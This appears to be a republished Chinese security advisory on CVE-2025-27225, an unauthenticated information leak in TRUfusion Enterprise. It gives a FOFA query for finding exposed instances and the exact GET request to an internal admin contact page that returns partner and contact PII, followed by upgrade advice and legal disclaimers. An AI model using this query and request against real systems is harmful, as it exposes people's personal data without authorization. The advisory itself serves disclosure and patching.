文章总结: TRUfusionEnterprise7.10.4.0及更早版本存在严重漏洞CVE-2025-27225,允许未经身份验证访问内部管理员联系人页面,导致合作伙伴和联系人姓名等PII信息泄露。攻击者可通过访问/trufusionPortal/jsp/internal_admin_contact_login.jsp端点获取敏感数据。建议立即升级到7.10.3.1、7.10.1.1等安全版本以修复此漏洞。
综合评分: 84
文章分类: 漏洞分析,WEB安全,漏洞预警
【已复现】CVE-2025-27225
原创
zz
星络安全实验室
2025年10月5日 00:08
中国香港
| |
| — |
| 免责声明:文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责作者不为此承担任何责任,一旦造成后果请自行负责 |
TRUfusion Enterprise 版本 7.10.4.0 及更早版本包含一个漏洞,该漏洞允许未经身份验证访问内部管理员联系人页面,从而导致 PII(包括合作伙伴和联系人姓名)泄露。
fofa语句:
body="TRUfusion"
数据包如下:
GET /trufusionPortal/jsp/internal_admin_contact_login.jsp HTTP/1.1
Host: xx
端点/trufusionPortal/jsp/internal_admin_contact_login.jsp会返回一个包含所有有权访问 TRUfusion 实例的合作伙伴的 PII 列表:
建议:
通过更新到以下版本之一,将 TRUfusion Enterprise 升级到安全版本:7.10.3.1、7.10.1.1、7.10.1.0、7.10.3.0、7.9.6.1、7.9.6.0、7.9.5.0、7.9.4.0、7.9.3.1、7.9.3.0、7.9.2.1、7.10.2.0 或 7.10.0.1。
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:星络安全实验室 zz《【已复现】CVE-2025-27225》